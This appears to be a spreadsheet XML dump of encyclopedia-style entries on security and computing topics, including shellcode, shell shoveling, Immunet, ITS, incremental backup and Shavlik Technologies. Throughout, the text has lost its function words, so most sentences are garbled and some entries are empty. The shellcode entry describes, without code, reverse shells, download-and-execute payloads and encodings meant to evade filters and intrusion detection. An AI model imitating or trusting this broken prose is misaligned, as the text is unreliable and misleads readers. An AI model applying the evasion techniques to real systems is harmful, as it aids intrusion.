    <t>hacking, shellcode small piece code used payload exploitation software vulnerability. called "shellcode" typically starts command shell attacker control compromised machine, piece code performs similar task called shellcode. because function payload limited merely spawning shell, suggested name shellcode insufficient. however, attempts replacing term gained wide acceptance. shellcode commonly written machine code. when creating shellcode, generally desirable make small executable, allows used wide variety situations possible. writing good shellcode much science. assembly code, function performed multitude ways variety lengths opcodes used purpose; good shellcode writers small opcodes create compact shellcode. some reached smallest possible size maintaining stability. types shellcode shellcode either local remote, depending whether gives attacker control machine runs (local) another machine network (remote). local local shellcode used attacker limited access machine exploit vulnerability, example buffer overflow, higher-privileged process machine. successfully executed, shellcode provide attacker access machine higher privileges targeted process. remote remote shellcode used attacker wants target vulnerable process running another machine local network, intranet, remote network. successfully executed, shellcode provide attacker access target machine across network. remote shellcodes normally standard tcp/ip socket connections allow attacker access shell target machine. such shellcode categorized based connection shellcode establishes connection, called "reverse shell" connect-back shellcode shellcode connects back attacker's machine. hand, attacker establishes connection, shellcode called bindshell shellcode binds certain port victim's machine. there's peculiar shellcode named bindshell random port skips binding part listens random port made available operating system. because bindshell random port became smallest stable bindshell shellcode x86_64 available date. third, much less common type, socket-reuse shellcode. this type shellcode sometimes used exploit establishes connection vulnerable process closed shellcode run. shellcode re-use connection communicate attacker. socket re-using shellcode elaborate, since shellcode needs find connection re-use machine many connections open.a firewall used detect outgoing connections made connect-back shellcode well incoming connections made bindshells. they therefore offer protection attacker, even system vulnerable, preventing attacker connecting shell created shellcode. this reason socket re-using shellcode sometimes used: create connections therefore harder detect block. download execute download execute type remote shellcode downloads executes form malware target system. this type shellcode spawn shell, rather instructs machine download certain executable file network, save disk execute nowadays, commonly used drive-by download attacks, victim visits malicious webpage turn attempts download execute shellcode order install software victim's machine. variation type shellcode downloads loads library. advantages technique code smaller, require shellcode spawn process target system, shellcode need code clean targeted process done library loaded process. staged when amount data attacker inject target process limited execute useful shellcode directly, possible execute stages. first, small piece shellcode (stage executed. this code downloads larger piece shellcode (stage process's memory executes egg-hunt this another form staged shellcode, used attacker inject larger shellcode process cannot determine process small egg-hunt shellcode injected process predictable location executed. this code searches process's address space larger shellcode (the egg) executes omelette this type shellcode similar egg-hunt shellcode, looks multiple small blocks data (eggs) recombines larger block (the omelette) subsequently executed. this used attacker inject number small blocks data process. shellcode execution strategy exploit commonly inject shellcode target process time exploits vulnerability gain control program counter. program counter adjusted point shellcode, gets executed performs task. injecting shellcode often done storing shellcode data sent network vulnerable process, supplying file read vulnerable process command line environment case local exploits. shellcode encoding because processes filter restrict data injected, shellcode often needs written allow restrictions. this includes making code small, null-free alphanumeric. various solutions found around restrictions, including: design implementation optimizations decrease size shellcode. implementation modifications around limitations range bytes used shellcode. self-modifying code modifies number bytes code executing re-create bytes normally impossible inject process.since intrusion detection detect signatures simple shellcodes sent network, often encoded, made self-decrypting polymorphic avoid detection. percent encoding exploits target browsers commonly encode shellcode javascript string using percent-encoding, escape sequence encoding "\uxxxx" entity encoding. some exploits also obfuscate encoded shellcode string prevent detection ids. example, ia-32 architecture, here's (no-operation) instructions would look, first unencoded: this instruction used slides. null-free shellcode most shellcodes written without null bytes intended injected target process null-terminated strings. when null-terminated string copied, copied including first null subsequent bytes shellcode processed. when shellcode contains nulls injected way, part shellcode would injected, making incapable running successfully. produce null-free shellcode shellcode contains null bytes, substitute machine instructions contain zeroes instructions effect free nulls. example, ia-32 architecture could replace instruction: 01000000 eax,1 register 0x000000001 contains zeroes part literal expands 0x00000001) instructions: 33c0 eax,eax register 0x000000000 increase 0x00000001 effect take fewer bytes encode free nulls. alphanumeric printable shellcode alphanumeric shellcode shellcode consists assembles execution entirely alphanumeric ascii unicode characters 0-9, a-z. this type encoding created hackers hide working machine code inside appears text. this useful avoid detection code allow code pass filters scrub non-alphanumeric characters strings part, filters response non-alphanumeric shellcode exploits). similar type encoding called printable code uses printable characters (0-9, a-z, a-z, !@#%^&amp;*() etc.). similarly restricted variant echoable code containing characters accepted echo command. shown possible create shellcode looks like normal text english. writing alphanumeric printable code requires good understanding instruction architecture machine(s) code executed. demonstrated possible write alphanumeric code executable machine, thereby constituting multi-architecture executable code. certain circumstances, target process filter byte injected shellcode printable alphanumeric character. under circumstances, range instructions used write shellcode becomes limited. solution problem published phrack showed possible turn code alphanumeric code. technique often used create self-modifying code, allows code modify bytes include bytes outside normally allowed range, thereby expanding range instructions use. using trick, self-modifying decoder created initially uses bytes allowed range. main code shellcode encoded, also using bytes allowed range. when output shellcode run, decoder modify code able instruction requires function properly continues decode original shellcode. after decoding shellcode decoder transfers control executed normal. shown possible create arbitrarily complex shellcode looks like normal text english. unicode proof shellcode modern programs unicode strings allow internationalization text. often, programs convert incoming ascii strings unicode processing them. unicode strings encoded utf-16 bytes encode character four bytes special characters). when ascii (latin-1 general) string transformed utf-16, zero byte inserted byte original string. obscou proved phrack possible write shellcode successfully transformation. programs automatically encode shellcode alphanumeric utf-16-proof shellcode exist, based principle small self-modifying decoder decodes original shellcode. platforms most shellcode written machine code level vulnerability exploited gives attacker access process. shellcode therefore often created target specific combination processor, operating system service pack, called platform. exploits, constraints shellcode target process, specific shellcode must created. however, impossible shellcode work multiple exploits, service packs, operating systems even processors. such versatility commonly achieved creating multiple versions shellcode target various platforms creating header branches correct version platform code running when executed, code behaves differently different platforms executes right part shellcode platform running shellcode analysis shellcode cannot executed directly. order analyze shellcode attempts must loaded another process. common analysis technique write small program holds shellcode byte buffer, function pointer inline assembler transfer execution another technique online tool, shellcode_2_exe, embed shellcode pre-made executable husk analyzed standard debugger. specialized shellcode analysis tools also exist, idefense sclog project originally released 2005 part malcode analyst pack. sclog designed load external shellcode files execute within logging framework. emulation based shellcode analysis tools also exist sctest application part cross platform libemu package. another emulation based shellcode analysis tool, built around libemu library, scdbg includes basic debug shell integrated reporting features. also alphanumeric code computer security buffer overflow exploit (computer security) heap overflow metasploit project shell (computing) shell shoveling stack buffer overflow vulnerability (computing) references external links shell-storm database shellcodes multi-platform. introduction buffer overflows shellcode basics shellcoding (pdf) overview shellcoding angelo rosiello introduction shellcode development contains non-x86 shellcode samples online interface automatic shellcode generation encoding, metasploit project shellcode archive, sorted operating system. microsoft windows linux shellcode design tutorial going basic advanced. windows linux shellcode tutorial containing step step examples. designing shellcode demystified alpha3 shellcode encoder turn shellcode unicode ascii, uppercase mixedcase, alphanumeric shellcode. writing small shellcode dafydd stuttard whitepaper explaining make shellcode small possible optimizing design implementation. writing ia32 restricted instruction shellcode decoder loops skylined archived 2015-04-03 wayback machine whitepaper explaining create shellcode bytes allowed shellcode restricted. beta3 tool encode decode shellcode using variety encodings commonly used exploits. shellcode online converter embed shellcode husk sclog updated build idefense sclog shellcode analysis tool (windows) libemu emulation based shellcode analysis library (*nix/cygwin) scdbg shellcode debugger built around libemu emulation library (*nix/windows)</t>
  </si>
  <si>
    <t>Image Constraint Token</t>
  </si>
  <si>
    <t>image constraint token (ict) protocol flag cause downsampling high-definition video content blu-ray slightly-better-than-dvd quality video. part advanced access content system, digital rights management system used high-definition optical disc formats. operation when using aacs-enabled player, components display chain (including display panel) must considered "secure". this security enforced high-bandwidth digital content protection (hdcp) system, available devices support hdmi video connections. components display chain support hdcp (such display connected player analog connections like component, composite s-video) flag enabled, player automatically reduces high-definition video resolution 960x540 pixels outputting hence, higher resolution standard dvd, resulting video signal longer truly high-definition. image constraint token applies disc basis, movie title could enabled another different studio could disabled. impacts video only, effect audio signal quality. discs enabled (theoretically) marked outside package, allowing consumers specific disc flag enabled. note conjunction hdcp used protect display path video data travels, actual data disc itself. rationale attempt prevent individuals creating unauthorized high-resolution copies copyrighted content. without content protection, users appropriate equipment could easily capture every frame film full resolution, effectively making "perfect" copy. although danger greatest unsecured digital outputs, analog outputs also allow copies made, albeit potential slightly reduced quality. some hdtv early adopters object flag initial hdtvs incorporate hdcp support thus, activated, individuals would able enjoy high-definition video discs. references also macrovision</t>
  </si>
  <si>
    <t>Shell shoveling</t>
  </si>
  <si>
    <t>shell shoveling, network security, refers redirecting input output shell service remotely accessed.in computing, basic method interfacing operating system shell. microsoft windows based systems, program called cmd.exe command.com. unix unix-like systems, variety programs bash, ksh, etc. this program accepts commands typed prompt executes them, usually real time, displaying results referred standard output, usually monitor screen. shell shoveling process, programs (perhaps silently without notifying someone observing computer) accepting input remote system redirecting output remote system; therefore operator shoveled shell able operate computer present console. references kanclirz, (2008), netcat power tools, syngress, 170, isbn 978-1-59749-257-7, archived original 2013-10-02</t>
  </si>
  <si>
    <t>Immobiliser</t>
  </si>
  <si>
    <t>Immunet</t>
  </si>
  <si>
    <t>immunet free, cloud-based, community-driven antivirus application, using clamav engine. software complementary existing antivirus software. january 2011 immunet acquired sourcefire.the application free-of-charge, although commercial version available. claims lightweight provides always up-to-date protection threats. virus signature files stored cloud, individual computers, signature downloads required. once virus detected blocked user, immunet users receive protection almost instantly. software noted ability allow individual users easily author signatures. products immunet previously provided sourcefire editions, free (for personal use), plus (for commercial use). june 2014, commercial version discontinued, though cisco (having acquired sourcefire) continued support free version.at version 2014, immunet free offers protection based upon virus definitions cloud, option include clamav off-line virus definitions connected internet. immunet advises free version used alongside another antivirus program, supports several particular programs sense co-install properly work tandem normal operations without obvious interference resource drag. this significant difference immunet contemporary antivirus products. effectiveness while independent testing performed, pcmag, 2010, rated product fair effectiveness.immunet's virus definitions stored servers available internet, requiring less memory system resource antivirus programs reside user's computer. cloud protection known give better protection detection, hand, offline protection particularly good. overall, effectiveness free product average; company recommends users employ free product additional protection, rather using alone. windows older versions immunet satisfies virus protection spyware unwanted software protection action center alerts toolbar unlike commercial antiviruses satisfy both. also comparison antivirus software references external links official website clamav website</t>
  </si>
  <si>
    <t>Immunix</t>
  </si>
  <si>
    <t>immunix discontinued commercial operating system provided host-based application security solutions. last release immunix's linux distribution version november 2003. immunix, inc. creator apparmor, application security system. 2005, novell acquired immunix, inc., long-time partner novell. apparmor novell's primary interests, result, adopted company renamed novell apparmor powered immunix. september 2007, novell laid apparmor team. also novell security-focused operating system references</t>
  </si>
  <si>
    <t>Impossible differential cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, impossible differential cryptanalysis form differential cryptanalysis block ciphers. while ordinary differential cryptanalysis tracks differences propagate cipher greater expected probability, impossible differential cryptanalysis exploits differences impossible (having probability intermediate state cipher algorithm. lars knudsen appears first form attack, 1998 paper introduced candidate, deal. first presentation attract attention cryptographic community later year rump session crypto '98, biham, alex biryukov, shamir introduced name "impossible differential" used technique break rounds idea rounds nsa-designed cipher skipjack. this development cryptographer bruce schneier speculate previous knowledge impossible differential cryptanalysis. technique since applied many ciphers: khufu khafre, variants serpent, mars, twofish, rijndael, crypton, zodiac, hierocrypt-3, tea, xtea, mini-aes, aria, camellia, shacal-2.biham, biryukov shamir also presented relatively efficient specialized method finding impossible differentials called miss-in-the-middle attack. this consists finding "two events probability one, whose conditions cannot together." references further reading dunkelman (march 1999). analysis serpent-p serpent-p-ns (pdf/postscript). rump session, candidate conference. rome: nist. retrieved 2007-02-27. biham; biryukov; shamir (may 1999). cryptanalysis skipjack reduced rounds using impossible differentials (pdf/postscript). advances cryptology eurocrypt '99. prague: springer-verlag. 12–23. retrieved 2007-02-13. kazumaro aoki; masayuki kanda (1999). "search impossible differential (pdf/postscript). retrieved 2007-02-27. {{cite journal}}: cite journal requires |journal= (help) biham, vladimir furman (april 2000). impossible differential 8-round mars' core (pdf/postscript). candidate conference. 186–194. retrieved 2007-02-27. biham; vladimir furman (december 2000). improved impossible differentials twofish (pdf/postscript). indocrypt 2000. calcutta: springer-verlag. 80–92. retrieved 2007-02-27. deukjo hong; jaechul sung; shiho moriai; sangjin lee; jongin (april 2001). impossible differential cryptanalysis zodiac. international workshop fast software encryption (fse 2001). yokohama: springer-verlag. 300–311. archived original (pdf) 2007-12-13. retrieved 2006-12-30. raphael c.-w. phan; mohammad umar siddiqi (july 2001). "generalised impossible differentials advanced encryption standard". electronics letters. (14): 896–898. bibcode:2001ell....37..896p. doi:10.1049/el:20010619. jung cheon, munju kim, kwangjo (september 2001). impossible differential cryptanalysis hierocrypt-3 reduced rounds (pdf). proceedings nessie workshop. retrieved 2007-02-27.{{cite conference}}: maint: multiple names: authors list (link) jung cheon; munju kim; kwangjo kim; jung-yeun lee; sungwoo kang (december 2001). improved impossible differential cryptanalysis rijndael crypton. international conference information security cryptology (icisc 2001). seoul: springer-verlag. 39–49. citeseerx 10.1.1.15.9966. dukjae moon; kyungdeok hwang; wonil lee; sangjin lee; jongin (february 2002). impossible differential cryptanalysis reduced round xtea (pdf). international workshop fast software encryption (fse 2002). leuven: springer-verlag. 49–60. retrieved 2007-02-27. raphael c.-w. phan (may 2002). "classes impossible differentials advanced encryption standard". electronics letters. (11): 508–510. bibcode:2002ell....38..508p. doi:10.1049/el:20020347. raphael c.-w. phan (october 2003). "impossible differential cryptanalysis mini-aes" (pdf). cryptologia. xxvii (4): 283–292. doi:10.1080/0161-110391891964. issn 0161-1194. s2cid 2658902. archived original (pdf) 2007-09-26. retrieved 2007-02-27. raphael c.-w. phan (july 2004). "impossible differential cryptanalysis 7-round aes". information processing letters. (1): 29–32. doi:10.1016/j.ipl.2004.03.006. retrieved 2007-07-19. wenling wentao zhang; dengguo feng (2006). "impossible differential cryptanalysis aria camellia" (pdf). retrieved 2007-02-27. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>Improper input validation</t>
  </si>
  <si>
    <t>improper input validation unchecked user input type vulnerability computer software used security exploits. this vulnerability caused "[t]he product validate incorrectly validates input affect control flow data flow program."examples include: buffer overflow cross-site scripting directory traversal null byte injection injection uncontrolled format string references</t>
  </si>
  <si>
    <t>Sheep dip (computing)</t>
  </si>
  <si>
    <t>data security, sheep-dip process using dedicated computer test files removable media viruses allowed used computers.this protocol normal first line defense viruses high-security computing environments security specialists expected familiar concept.the process originally developed response problem boot sector viruses floppy discs. subsequently, scope expanded include flash drives, portable hard discs, memory cards, cd-roms removable devices, potentially carry malware. name sheep-dip derived method preventing spread parasites flock sheep dipping animals another trough pesticide. term since least early 1990s, though footbath also used time. sheep-dip system considered special case sandbox, used test malware. references external links sourceforge. "the sheepdip project". open source active sheep-dip software.</t>
  </si>
  <si>
    <t>InMage</t>
  </si>
  <si>
    <t>inmage computer software company based india. marketed product line called scout used continuous data protection (cdp) backup replication. scout consisted product lines: host-offload line, uses software agent protected servers, fabric line, uses agent fibre channel switch fabric. software protects volume block level, tracking write changes. allows local remote protection policies. first version product released 2002. product details scout features capacity optimized repository. continuous approach allows near zero backup windows, point time restores, second level rpos, within datacenter across datacenters. target volume kept updated either synchronously asynchronously based product line. retention logs allow point time recovery user specified retention window. scout also features application failover support disaster recovery. release scout supported microsoft windows, linux, solaris, also supports vmware, xenserver, hyper-v, solaris zones server virtualization platforms. both server application failover supported microsoft windows. application failover supports microsoft exchange, blackberry enterprise server, microsoft server, file servers, microsoft sharepoint, oracle, mysql among others. release series supports clustered clustered operation. scout integrates traditional tape backup software enable longer term retention tape. scout integrates microsoft's apis sql, exchange, hyper-v consistent snapshots. also integrates oracle, db2, mysql, postgresql consistency apis. company inmage founded 2001 murali rajagopal kumar malvalli systems. microsoft corporation acquired inmage 2014. references</t>
  </si>
  <si>
    <t>InSSIDer</t>
  </si>
  <si>
    <t>inssider wi-fi network scanner application microsoft windows developed metageek, llc. received awards 2008 infoworld bossie award "best open source software networking", inssider longer open-source. history inssider began replacement netstumbler, popular windows wi-fi scanner, actively developed several years reputedly work modern 64-bit operating systems versions windows higher windows project inspired charles putney code project. features version 5.0: channel utilization break show device client) airtime utilization; connected client devices info client utilization signal strength gathers information wireless card software helps choose best wireless channel available wi-fi network information ssid, mac, vendor, data rate, signal strength, security graphs signal strength time shows wi-fi network channels overlap system requirements windows version 5.0: microsoft windows higher version 3.0: microsoft windows higher version 2.1: microsoft windows microsoft .net framework higher mountain lion 10.8 higher references external links official website inssider-2 github (apache license)</t>
  </si>
  <si>
    <t>Incompatible Timesharing System</t>
  </si>
  <si>
    <t>incompatible timesharing system (its) time-sharing operating system developed principally artificial intelligence laboratory, help project mac. name jocular complement compatible time-sharing system (ctss). its, software developed technically culturally influential beyond core user community. remote "guest" "tourist" access easily available early arpanet, allowing many interested parties informally features operating system application programs. wide-open philosophy collaborative online community major influence hacker culture, described steven levy's book hackers, direct forerunners free open-source software, open-design, wiki movements. history development initiated late 1960s (the majority staff time) disagreed direction taken project mac's multics project (which started mid-1960s), particularly decisions inclusion powerful system security. name chosen knight joke name earliest time-sharing operating system, compatible time-sharing system, dated early 1960s.by simplifying system compared multics, its's authors able quickly produce functional operating system lab. written assembly language, originally digital equipment corporation pdp-6 computer, majority development later, largely compatible, pdp-10.although used intensively 1986, continued operate original hardware 1990, 1995 stacken computer club sweden. today, implementations continue remotely accessible, emulation pdp-10 hardware running modern, low-cost computers supported interested hackers. significant technical features introduced many then-new features: first device-independent graphics terminal output; programs generated generic commands control screen content, system automatically translated appropriate character sequences particular type terminal operated user. general mechanism implementing virtual devices software running user processes (which called "jobs" its). using virtual-device mechanism, provided transparent inter-machine filesystem access. machines connected arpanet, user machine could perform operations files machines local files. sophisticated process management; user processes organized tree, superior process could control large number inferior processes. inferior process could frozen point operation, state (including contents registers) examined; process could resumed transparently. advanced software interrupt facility allowed user processes operate asynchronously, using complex interrupt handling mechanisms. pclsring, mechanism providing appeared user processes) quasi-atomic, safely-interruptible system calls. process could ever observe process (including itself) middle executing system call. support lab's robotics work, also supported simultaneous real-time time-sharing operation. user environment environment seen users philosophically significantly different provided operating systems time. initially passwords, user could work without logging logging considered polite, though, people knew connected. deal rash incidents users sought flaws system order crash novel approach taken. command caused system crash implemented could anyone, took away challenge did, however, broadcast message files editable users, including online documentation source code. series informal papers technical notes documented commands, technical issues, primitive games, mathematical puzzles, topics interest hacker community. some issued formal memos, including hakmem compendium. users could talk instant messaging another's terminal, could command (shout) active users help. users could happening another's terminal (using command called "output spy"). target could detect kill using another command called jedgar, named director edgar hoover. this facility later disabled placebo command: appeared remote session killed, not. tourists (guest users either terminals, arpanet) tolerated occasionally invited actively join community. informal policy tourist access later formalized written policy. ease access, without guest account, allowed interested parties informally explore experiment operating system, application programs, "hacker" culture. working copies documentation source code could freely consulted updated anybody system. system security, extent existed, mostly-based facto "security obscurity". guest hackers willing dedicate significant time effort learning expected behave respectfully, avoid interfering research projects funded hardware software systems. there little exclusive value systems except information, much would eventually published free distribution, open free sharing knowledge generally encouraged.the wide-open philosophy collaborative community direct forerunner free open-source software, open-design, wiki movements. important applications developed emacs ("editor macros") editor originally written its. instantiation collection teco programs (called "macros"). later operating systems, written common language systems example, language unix, zetalisp lisp machine system. gnu‘s info help system originally emacs subsystem, later written complete standalone system unix-like machines. several important programming languages systems developed its, including maclisp (the precursor zetalisp common lisp), microplanner (implemented maclisp), (which became basis infocom's programming environment), scheme. among significant influential software subsystems developed its, macsyma symbolic algebra system, started 1968, first widely-known mathematical computing environment. forerunner maxima, matlab, wolfram mathematica, many computer algebra systems. terry winograd's shrdlu program developed its. computer game zork also originally written its. richard greenblatt's hack top-rated chess program years first display graphical board representation. miscellaneous default top-level command interpreter pdp-10 machine language debugger (ddt). usual text editor teco later emacs, written teco. both teco implemented simple dispatch tables single-letter commands, thus true syntax. task manager called peek. local spelling "turist" artifact six-character filename (and identifier) limitations, traceable sixbit encoded characters fitting single 36-bit pdp-10 word. "turist" also alan turing, pioneer theoretical computer science. less-complimentary term "luser" also applied guest users, especially repeatedly engaged clueless vandalous behavior.the jargon file started combined effort people machines stanford university sail. document described much terminology, puns, culture labs related research groups, direct predecessor hacker's dictionary (1983), first compendium hacker jargon issued major publisher (mit press). different implementations supported array peripherals, including automatic wire stripper devised hacker richard greenblatt, needed supply pre-stripped jumper wires various lengths wire-wrapping computer hardware others prototyping. device used stepper motor formerly hand-held wire stripper tool cutter, operated solenoid, computer control software. device accessible user, disappointingly unreliable actual use. xerox graphics printer (xgp), first laser printers world, supported 1974. prototype continuous roll-fed printers experimentation staff. 1982, supplemented xerox dover printer, early sheet-fed laser printer. although user could access laser printers, physical access pick printouts limited staff, control usage printer supplies specially ordered. ctss file systems number design elements common. both m.f.d. (master file directory) u.f.d. (user file directories). neither nested directories (sub-directories) both file names consisting names maximum six-characters long. both support linked files. original developers richard greenblatt stewart nelson knight richard stallman also time-sharing system evolution references bibliography external links system documentation system running online open logins public system operated update computer club uppsala university klh10: harrenstien's pdp-10 emulator instructions allowing simh pdp-10 emulator. jargon file entry bibliography</t>
  </si>
  <si>
    <t>Incremental backup</t>
  </si>
  <si>
    <t>incremental backup successive copies data contain portion changed since preceding backup copy made. when full recovery needed, restoration process would need last full backup plus incremental backups point restoration. incremental backups often desirable reduce storage space usage, quicker perform differential backups. variants incremental basic form incremental backup consists identifying, recording thus, preserving files changed since last backup. since changes typically low, incremental backups much smaller quicker full backups. instance, following full backup friday, monday backup contain files changed since friday. tuesday backup contains files changed since monday, full restoration data naturally slower, since increments must restored. should copies created fail, including first (full), restoration incomplete. unix example would rsync's --link-dest option makes command example incremental backup. multilevel incremental sophisticated incremental backup scheme involves multiple numbered backup levels. full backup level level backup back everything changed since recent level backup. suppose instance level backup taken sunday. level backup taken monday would include changes made since sunday. level backup taken tuesday would include changes made since monday. level backup taken wednesday would include changes made since tuesday. level backup taken thursday, would include changes made since monday monday recent level backup. reverse incremental incremental backup changes made instances mirror forward reverse. oldest version mirror treated base newest version revised version, incremental produced forward incremental. newest version mirror treated base oldest version revised changed version, incremental produced reverse incremental. making backups using reverse incremental backups, time reverse incremental backup taken, applied reverse) previous full (synthetic) backup, thus current full (synthetic) backup always backup recent state system. this contrast forward incremental backups current full backup backup oldest version system, backup recent state system, forward incremental backups applied oldest version successively. applying reverse incremental mirror, result previous version mirror. this gives means revert previous version mirror. words, initial full backup, successive incremental backup applies changes previous full, creating synthetic full backup every time, maintaining ability revert previous versions. main advantage type backup efficient recovery process, since recent version data (which frequently restored version) (synthetic) full backup, incrementals need applied restoration. reverse incremental backup works tapes disks, practice tends work better disks. companies using reverse incremental backup method include intronis zetta.net. incremental forever this style similar synthetic backup concept. after initial full backup, incremental backups sent centralized backup system. this server keeps track increments sends proper data back client restores. this implemented sending incremental directly tape taken refactoring tapes necessary. enough disk space available, online mirror maintained along previous incremental changes current older versions systems backed restored. this suitable method case banking systems.in modern cloud architectures, disk disk backup scenarios, much simpler. data broken chunks placed cloud storage system. metadata chunks stored persistent system, allows system assemble point time backup chunks restore time. there need refactor tape. block-level incremental this method backs blocks within file changed. this requires higher level integration sender receiver. byte-level incremental these backup technologies similar "block-level incremental" backup method; however, byte binary) incremental backup method based binary variation files compared previous backup: block-based technologies work heavy changing units (blocks 1k), byte-based technologies work minimum unit, saving space reflecting change file. another important difference work independently file system. moment, technologies achieve highest relative compression data, turning great advantage security copies carried internet. other backup types synthetic full backup synthetic backup alternative method creating full backups. instead reading backing data directly disk, synthesize data previous full backup (either regular full backup first backup, previous synthetic full backup) periodic incremental backups. incremental backups read data disk, files need transferred offsite replication. this greatly reduces bandwidth needed offsite replication. synthetic backup always work efficiency. rate data uploaded target machine data, synchronized storage, varies depending disk fragmentation. differential differential backup cumulative backup changes made since last full normal backup, i.e., differences since last full backup. advantage quicker recovery time, requiring full backup last differential backup restore system. disadvantage elapsed since last full backup, data needs backed especially significant proportion data changed. forward incremental-forever forward incremental-forever backup allows synthetic operation create full backup, limited size incremental file, instead complete size full backup file would happen “forward mode synthetic fulls”. overall consumed reversed incremental, duration backup activity write used snapshot opened less time reversed incremental; remaining used update full backup file. also backup rotation scheme continuous data protection delta encoding dump (unix) unix utility multilevel incremental file system backups. incremental computing rsync file synchronization algorithm protocol. references further reading</t>
  </si>
  <si>
    <t>Shorewall</t>
  </si>
  <si>
    <t>shorewall open source firewall tool linux builds upon netfilter (iptables/ipchains) system built linux kernel, making easier manage complex configuration schemes providing higher level abstraction describing rules using text files. configuration daemon since continuously, rather configures rules kernel allow disallow traffic system. shorewall configured group plain-text configuration files graphical user interface, though webmin module available separately. monitoring utility packaged shorewall used watch status system operates assist testing. shorewall mainly used network installations opposed personal computer firewall), since strength lies ability work "zones", 'net' zone. each zone would different rules, making easy example relaxed rules company intranet, clamp traffic coming internet. plain-text configuration files usually well-commented easy use, though shorewall difficult users handle firewall systems graphical front-ends. history starting version shorewall began using perl-based compiler frontend; previously used shell-based compiler frontend. support ipv6 firewalling included since version 4.2.4.on february 2019, primary developer eastep announced retiring project, 5.2.3 would final release. management shorewall project handed shorewall committee would manage future direction shorewall project. eastep however continues major contributor shorewall project september 2020. also free software portal references external links official website</t>
  </si>
  <si>
    <t>Shavlik Technologies</t>
  </si>
  <si>
    <t>shavlik technologies privately held company founded 1993 mark shavlik, original developers windows late 1980s early 1990s microsoft.the company provided software services network vulnerability assessment managing network security patches. mark shavlik left role shavlik technologies acquired vmware 2011, held position vice president general manager vmware march 2013. april 2013, landesk purchased shavlik business unit rights shavlik products vmware. during period, landesk announced partnership made vmware alliance partner.in 2017 landesk merged heat software created software company called ivanti. today, shavlik name retired, shavlik products vital ivanti security portfolio. history prior acceptance windows legitimate, enterprise operating system late 1990s, enterprise software written unix mainframe operating system. shavlik's roots providing consulting services help organizations make leap microsoft os's contributed delivering products shavlik later extended services business software security consulting, primarily businesses highly regulated industries banking healthcare. services centered providing certified information systems security professional (cissp) perform security audits penetration testing. early 2000s failure keep software up-to-date applying patches common flag audits. central challenges addressing problem companies easy determine machines date methodology deploy updates. during era, microsoft wrestled addressing issue internally. they wanted tool detect servers large server environment missing patches "hot fixes" (see hotfix) could installed machines. however, servers critical operations, microsoft required process completed without installing extra software, agent, servers. effort address "hot fix"issue, shavlik built first agentless patch scanner windows product named hfnetchk (the acronym designating hotfix network check). hfnetchk release followed another partnership wherein shavlik helped build microsoft baseline security analyzer (mbsa). this tool minimal patch scanning along basic configuration checks. delivered microsoft part windows 2000 server toolkit. hfnetchk 3.0, never released externally, introduced ability scan missing patches also deploy patches. this eliminated need administrator apply patches manually. 2003, shavlik brought hfnetchk market first time. version featured visual basic "web friendly" user interface. previous versions hfnetchk operated command line interface. patch management january 2003, slammer worm exploited vulnerability server allowed denial service slowed traffic many internet hosts crawl. worm went viral affecting 75,000 systems first minutes. microsoft made patch available months prior indicating failure patch widespread, security breach, vulnerability itself.shavlik's hfnetchk first product market could scan deploy missing patches windows machines. aftermath slammer worm series highly publicized exploits 2003/2004, shavlik made decision move away consulting fully invest software development patch management products. shavlik protect shavlik added standalone integrated anti-virus capabilities version hfnetchk changed product name hfnetchk protect, eventually dropping hfnetchk.during version timeframe, protect introduced capability patch offline virtual machines templates. this project first series partnerships shavlik entered vmware, capability meant protect could agentlessly patch machines physical virtual environments. with version various point releases, user interface introduced well physical virtual asset inventory. agent support integrated protect longer offered separately licensed product. shavlik also shifted detection logic protect content. version protect fixed many stability issues. number customer complaints, shavlik focused making product stable. version introduced hypervisor patching vmware implementations well ability patch off-network machines cloud. microsoft collaboration shavlik's technological advancements significant enough attract attention microsoft, resulting cooperative efforts companies development microsoft baseline security analyzer (mbsa), based shavlik's hfnetchk (the acronym designating hotfix network checker) released 2001. this technology evolved, still core technology current product offerings licensed multiple partners provide patch management capabilities variety management solutions combined install base millions users across globe.in late 2000s, industry applications exploited hackers shift microsoft microsoft applications third-party applications like java, adobe, music players, non-microsoft internet browsers. during time, products like microsoft system center configuration manager (sccm) provided windows patch capabilities windows server update services (wsus); however, (and still doesn't) patch third-party products. according global analyst firm gartner, left administrators limited choices: patch third-party products leaving network risk, author test custom patch time third-party product requires update, deploy patches manually affected machine.in april 2010, shavlik released scupdates catalog patch content automated process building third-party patches delivering windows clients integration microsoft system center updates publisher (scup) sccm. tandem initial scupdates release, microsoft shavlik also announced shavlik's inclusion microsoft system center alliance. patch management cloud 2010 shavlik released it.shavlik provided web-based front-end traditional shavlik toolkit asset inventory, patch scanning, patch deployment. this software service (saas) application simplified workflow inventory systems patching possible on-premises, protect solution. early 2009, shavlik formed partnership vmware build cloud-based application designed help administrators smaller businesses deploy virtual environment. vmware (vgo) intended "onramp virtualization," serving smaller customers ready upgrade sophisticated vcenter suite. originally brought market free-use cloud-based product. vmware shavlik invested heavily vgo, product expanded include asset inventory, patch scanning, advisor recommendation engine. later attempts monetize vgo's services, paid version called vmware introduced patch deployment. this migration users it.shavlik vmware acquisition history vmware's interest well virtual infrastructure patching capabilities within protect acquisition shavlik technologies 2011. terms acquisition publicly disclosed.in january 2013, vmware announced intent "sharpen focus" software-defined data center hybrid cloud services. part realignment, vmware sought sell products contributing core business sliderocket presentation software "non-key cloud virtualization technologies." shavlik product line found list. april 2013, landesk software purchased shavlik business unit rights shavlik products vmware. time landesk announced partnership added vmware landesk's list alliance partners. shavlik's move landesk triggered investment shavlik patch microsoft system center (formerly scupdates) well products enhance experience companies using sccm. early 2017, clearlake capital group acquired landesk shavlik, along heat software, appsense wavelink; combined company uses corporate name product brand, ivanti. references further reading shavlik moves with severnside housing external links official website</t>
  </si>
  <si>
    <t>ISMACryp</t>
  </si>
  <si>
